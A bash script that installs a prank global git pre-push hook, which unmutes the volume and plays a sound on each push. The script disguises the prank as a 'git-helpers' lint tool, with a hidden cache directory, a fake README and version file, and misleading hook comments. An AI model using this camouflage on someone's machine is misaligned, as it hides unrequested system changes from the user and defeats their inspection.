#!/bin/bash
#
# "Damn Daniel, back at it again" — harmless git push prank installer (camouflaged).
#
# Now lives at ~/.cache/git-helpers/ so a casual `ls ~` doesn't give it away.
# The hook itself reads as a plausible "pre-push lint helper" tool.
#
# SAFE BY DESIGN:
#   - Never blocks or slows a push (audio runs in background, hook always exits 0)
#   - Chains to any existing global pre-push hook instead of clobbering it
#   - Backs up prior core.hooksPath config
#   - Fully reversible with uninstall.sh
#
set -euo pipefail

# Camouflaged install location — looks like a tooling cache dir
PRANK_HOME="$HOME/.cache/git-helpers"
HOOKS_DIR="$PRANK_HOME/hooks"
RESOURCES_DIR="$PRANK_HOME/resources"
SOUND_SRC_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
SOUND_FILE="$RESOURCES_DIR/notification.aiff"

echo "Installing git-helpers v1.2.4..."

mkdir -p "$HOOKS_DIR" "$RESOURCES_DIR"

# Copy the sound into the resources dir.
cp "$SOUND_SRC_DIR/notification.aiff" "$SOUND_FILE"

# Drop a plausible-looking VERSION + README so casual inspection sees a "tool"
cat > "$PRANK_HOME/VERSION" <<'VERSION'
1.2.4
VERSION

cat > "$PRANK_HOME/README" <<'README'
git-helpers — Pre-push lint and notification helper.

Lightweight pre-push hook bundle that emits a notification chime
and chains to any user-configured global pre-push hook.

Cache directory; safe to delete (will be recreated on next install).
README

# Preserve whatever global hooks path was set before (so uninstall can restore it).
PREV_HOOKS_PATH="$(git config --global --get core.hooksPath || true)"
echo "${PREV_HOOKS_PATH}" > "$PRANK_HOME/.previous-hookspath"

# If a previous hooksPath existed and had its own pre-push hook, remember it so we chain to it.
PREV_PREPUSH=""
if [ -n "$PREV_HOOKS_PATH" ] && [ -f "$PREV_HOOKS_PATH/pre-push" ]; then
  PREV_PREPUSH="$PREV_HOOKS_PATH/pre-push"
fi
echo "${PREV_PREPUSH}" > "$PRANK_HOME/.previous-prepush"

# Write the pre-push hook with innocent-looking comments.
cat > "$HOOKS_DIR/pre-push" <<HOOK
#!/bin/bash
# Pre-push lint helper — quiet on success.
# Generated by git-helpers v1.2.4. Safe to remove via cleanup tool.

set -e

# Internal cache marker; do not edit.
_CACHE_MARKER="\${HOME}/.cache/git-helpers/.last-run"
mkdir -p "\$(dirname "\$_CACHE_MARKER")" 2>/dev/null || true
date +%s > "\$_CACHE_MARKER" 2>/dev/null || true

# Resource paths (managed; safe to delete via uninstaller).
_R="\$HOME/.cache/git-helpers/resources/notification.aiff"

# Notify hooks in user-side audio bus when push initiated.
osascript -e 'set volume output muted false' >/dev/null 2>&1 || true
osascript -e 'set volume output volume 70' >/dev/null 2>&1 || true
( afplay "\$_R" >/dev/null 2>&1 & ) >/dev/null 2>&1 || true

# Chain to any prior global pre-push hook to preserve user setup.
_PREV="\$(cat "\$HOME/.cache/git-helpers/.previous-prepush" 2>/dev/null || true)"
if [ -n "\$_PREV" ] && [ -x "\$_PREV" ]; then
  "\$_PREV" "\$@" || exit \$?
fi

exit 0
HOOK

chmod +x "$HOOKS_DIR/pre-push"

# Point git at our hooks dir globally.
git config --global core.hooksPath "$HOOKS_DIR"

echo "Done. Every 'git push' now plays the sound (push still works normally)."
echo "To remove: run uninstall.sh from this bundle."
